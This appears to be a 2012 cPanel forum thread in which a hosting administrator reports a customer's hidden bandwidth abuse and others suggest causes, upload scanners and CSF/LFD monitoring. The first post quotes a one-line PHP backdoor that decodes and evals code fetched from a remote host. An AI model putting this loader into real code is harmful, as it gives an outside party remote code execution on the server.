The Community Forums

Interact with an entire community of cPanel & WHM users!
  1. This site uses cookies. By continuing to use this site, you are agreeing to our use of cookies. Learn More.

account hacked

Discussion in 'Security' started by domz, Apr 25, 2012.

  1. domz

    domz Registered

    Joined:
    Apr 25, 2012
    Messages:
    2
    Likes Received:
    0
    Trophy Points:
    1
    cPanel Access Level:
    Root Administrator
    I had a user register, after about a month use, we found out he was pulling 5TB of bandwidth a month and CPANEL WAS report he had used 0 GB.

    He had one php document with this in it:
    Code:
    <?eval(@base64_decode(@file_get_contents("http://ba.d.s.ite.was.here..com/stream.php?a=".$_SERVER['REMOTE_ADDR']."&".$_SERVER['QUERY_STRING'])));?>
     
  2. domz

    domz Registered

    Joined:
    Apr 25, 2012
    Messages:
    2
    Likes Received:
    0
    Trophy Points:
    1
    cPanel Access Level:
    Root Administrator
    He owns that website noobroom. Here is his details:
    -removed-
     
    #2 domz, Apr 25, 2012
    Last edited by a moderator: Apr 25, 2012
  3. NetMantis

    NetMantis BANNED

    Joined:
    Apr 22, 2012
    Messages:
    117
    Likes Received:
    0
    Trophy Points:
    0
    Location:
    Utah
    cPanel Access Level:
    DataCenter Provider
    There is a number of ways that can there but illustrates way you need to have good proper security in place.

    1. The user's computer at home may of been infected with a virus and a hacker upload the files

    2. Much more likely the case, a vulnerable web program was exploited using a known security hole for code injection

    (This incidentally is exactly the reason to make sure all web programs on all hosting accounts keep updated
    with the latest and newest updates and security patches)

    There is also a very good chance once one was placed, you have others in other web sites unless you have hardened against cross site scripting but I'd take a fair guess you don't have that kind of protection so it would be a very good idea to go ahead and scan and check all the other websites on your server for similar compromises.

    PS: as a matter of security, you might want to sensor the domain name in the same eval line you posted (IE: *****.com)
     
  4. Ivan@rh

    Ivan@rh Member

    Joined:
    Apr 23, 2012
    Messages:
    9
    Likes Received:
    0
    Trophy Points:
    1
    cPanel Access Level:
    Root Administrator
    You need a good upload scanner to prevent malicious code injection. Check cxs by configserver.com. It is commercial software, $50US one-off fee, but is good against this type of attacks
     
  5. brianoz

    brianoz Well-Known Member

    Joined:
    Mar 13, 2004
    Messages:
    1,146
    Likes Received:
    6
    Trophy Points:
    38
    Location:
    Melbourne, Australia
    cPanel Access Level:
    Root Administrator
    While we appreciate you trying to be helpful, this is a technical forum and it's important to read and understand the OP's post you are answering.

    In his post, he said that the user had uploaded a single encrypted file which was then loading files from another server.

    What I'm curious about is why cPanel didn't pick up the bandwidth usage - did none of the used bandwidth leave the machine?

    I guess the other question is how something like CSF could be used - if even possible - to restrict this sort of behaviour?

    ... and this was an excellent point :)
     
  6. NetMantis

    NetMantis BANNED

    Joined:
    Apr 22, 2012
    Messages:
    117
    Likes Received:
    0
    Trophy Points:
    0
    Location:
    Utah
    cPanel Access Level:
    DataCenter Provider
    I find the Cpanel's bandwidth tracking is a bit weak and lacking for accuracy.

    Just a few generalized points and observations on the topic and a few helpful tips:

    Cpanel usually only tracks standard activities live web page views, email as long as it's normal smtp type of channels with the correct username, etc. I find that as a whole, Cpanel actually misses quite a lot and I have seen many times where Cpanel's logs and account bandwidth tracker failed to log items that it should of caught. The programmers probably didn't have hacking or other such unusual circumstances in mind when they wrote those programs.

    Bottom line is I would not rely on Cpanel's usage reports to tell you these things and then regarding the mention of LFD, it's possible the user also did not configure CSF / LFD to track those type of events either as that does take a little bit of configuring to setup.

    There is several tattle tale signs to know when something like this is happening even without the logs or security reports and that is just simply watching the load levels of the server and the size of the eximstats database and mail queues or, even just simply taking note of the size of the /var/log/exim_mainlog file compared against it's average size from any other week.

    If you suddenly see a rise in server loads or a continuous jump up in mail processing, that's a good indication that you need to probably at the very least take a closer look at what is going on in the server because there is a fair chance someone is doing something they shouldn't be doing.

    Another item to keep a regular eye on is most all web server providers whether that be dedicated or VPS of any type, usually have some sort of traffic or bandwidth usage monitoring system in place setup mainly so the hosting provider knows whether to charge you for over usage. That same interface from the server provider is often more accurate than Cpanel's bandwidth tracking so if you find the numbers your server provider reports very different than what Cpanel reports, that's another good reason to go look deeper at what is happening on the server and find out what is going on behind the scenes.

    Brianoz, as you pointed out CSF / LFD does have within it everything that is needed to keep a watchful eye out for unusual high activity or usage surges and I would recommend everyone use those features. Unfortunately that part of LFD is not turned on by default and many people won't take the time to read through the "csf.conf" file or really configure it to it's fullest capabilities but to those who do, kudos to you because it's well worth the time to setup those extra features to be able to keep a better watchful eye on what is happening in your server.

    Bottom line to everyone pulling all the above points together is just simply always be observant and watch out for unusual changes in your server loads, traffic, or mail queues. If you suddenly get more activity than usual, then at the very least you should check it out immediately and not sit around for a few weeks or a month for someone to tell you later you have been hacked. Anyone keeping a close eye on the activity of their own server should be able to tell when there is something unusual happening.

    Okay well that's my 2 cents on those issues for the evening if it helps anyone out there. :D
     
    #6 NetMantis, Apr 29, 2012
    Last edited: Apr 29, 2012
  7. brianoz

    brianoz Well-Known Member

    Joined:
    Mar 13, 2004
    Messages:
    1,146
    Likes Received:
    6
    Trophy Points:
    38
    Location:
    Melbourne, Australia
    cPanel Access Level:
    Root Administrator
    Definitely turn on the SMTP_BLOCK and probably SMTP_LOCAL on your server - without it, hackers can anonymously send spam from the server.
     
Loading...

Share This Page